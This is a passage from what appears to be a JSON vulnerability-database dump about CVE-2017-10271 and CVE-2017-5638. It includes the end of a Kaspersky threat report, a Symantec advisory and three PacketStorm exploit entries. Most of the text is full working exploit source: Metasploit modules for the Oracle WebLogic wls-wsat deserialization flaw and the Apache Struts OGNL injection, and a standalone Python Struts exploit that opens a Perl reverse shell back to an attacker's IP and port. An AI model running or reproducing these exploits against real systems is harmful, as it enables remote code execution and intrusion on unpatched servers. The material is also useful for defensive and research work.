(described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23170555/NullMixer_report_06.jpg>)\n\nOnce all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.\n\nSince the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.\n\nMany of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in [our report](<https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/>). Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.\n\n### Potential threat in the browser\n\nBrowser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions \u2013 and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.\n\nMalicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google [removed](<https://threatpost.com/google-yanks-106-malicious-chrome-extensions/156731/>) 106 browser extensions from its Chrome Web Store \u2013 all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.\n\nIt&#x27;s always good to check the permissions an extension requests during installation. And if it&#x27;s asking for permission to do things that don&#x27;t seem appropriate, don&#x27;t install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it&#x27;s not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to &quot;read and change all your data on the websites you visit&quot;. They may really need it in order to function properly, but this permission gives the extension wide powers.\n\nEven if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. To earn more money, some developers [may pass](<https://www.pcworld.com/article/410966/web-of-trust-browser-extensions-yanked-after-proving-untrustworthy.html>) it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.\n\nExtension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.\n\nWe recently published an [overview of the types of threat that mimic useful web-browser extensions and statistics on attacks](<https://securelist.com/threat-in-your-browser-extensions/107181/>), using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.\n\nIn the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent affected by the same threat in the whole of last year.\n\nFrom January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.\n\nThe most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-18T08:00:32", "type": "securelist", "title": "IT threat evolution Q3 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-11882"], "modified": "2022-11-18T08:00:32", "id": "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "href": "https://securelist.com/it-threat-evolution-q3-2022/107957/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:08:30", "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-10-17T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "cvss3": {}, "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. \n# \ndef check_process_builder_payload \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java version=\"1.8\" class=\"java.beans.XMLDecoder\"> \n<void id=\"url\" class=\"java.net.URL\"> \n<string>#{get_uri.encode(xml: :text)}</string> \n</void> \n<void idref=\"url\"> \n<void id=\"stream\" method = \"openStream\" /> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# In the event that a 'check' host responds, we should respond randomly so that we don't clog up \n# the logs too much with a no response error or similar. \n# \ndef on_request_uri(cli, request) \nrandom_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' \nsend_response(cli, random_content) \n \n@received_request = true \nend \n \n# \n# The exploit method connects to the remote service and sends a randomly generated string \n# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive \n# the response from. This is based off of the exploit technique from \n# exploits/windows/novell/netiq_pum_eval.rb \n# \n# This doesn't work as is because MSF cannot mix HttpServer and HttpClient \n# at the time of authoring this \n# \n# def check \n# start_service \n# \n# print_status('Sending the check payload...') \n# res = send_request_cgi({ \n# 'method' => 'POST', \n# 'uri' => normalize_uri(target_uri.path), \n# 'data' => check_process_builder_payload, \n# 'ctype' => 'text/xml;charset=UTF-8' \n# }, datastore['TIMEOUT']) \n# \n# print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\") \n# \n# waited = 0 \n# until @received_request \n# sleep 1 \n# waited += 1 \n# if waited > datastore['HTTP_DELAY'] \n# stop_service \n# return Exploit::CheckCode::Safe \n# end \n# end \n# \n# stop_service \n# return Exploit::CheckCode::Vulnerable \n# end \n \n# \n# The exploit method connects to the remote service and sends the specified payload \n# encapsulated within a SOAP XML body. \n# \ndef exploit \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'data' => exploit_process_builder_payload, \n'ctype' => 'text/xml;charset=UTF-8' \n}, datastore['TIMEOUT']) \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt"}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << \"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we 